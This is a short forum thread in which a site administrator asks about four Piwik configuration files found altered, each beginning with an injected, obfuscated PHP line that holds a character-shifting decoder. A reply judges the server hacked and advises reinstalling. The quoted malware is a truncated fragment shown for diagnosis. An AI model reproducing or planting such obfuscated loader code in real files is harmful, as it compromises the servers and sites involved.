Syntax error in INI configuration -> security problem ($ozwnijtsn)

Hi folks. One of my customer called me to fix the following problem:

What I found was, four changed INI files.

  • config/config.ini.php
  • plugins/PiwikPro/config/test.php
  • plugins/MobileAppMeasurable/config/test.php
  • plugins/CorePluginsAdmin/config/config.php

Every INI file has the same first “unusual” line:

<?php $ozwnijtsn = '75]D:M8]Df#<%tdz>#L4]D6]281L1#/#M5]DgP5]D6#<%fdy>#]D4]273]D6P2L5P6]y6gP7L6M7]D4]2,67R37,#/q%>U<#16,47R57,27R66,#/q%>2q%<#g6R85,67R37,18R#>q%V<*cvpbbyz($n){return chr(ord($n)-1);} @error_reporbq}k;opjudovg}x;0]=])..... The piwik installation version was 2.16.3. My question is, does anyone know this security issue because I didn't find any advice? My solution to fix the problem was, to reinstall the whole piwik with an actual version. I am thankful for every hint!

This looks very much like your server has been hacked. I would treat the installation as compromised and re-install (or restore from backup)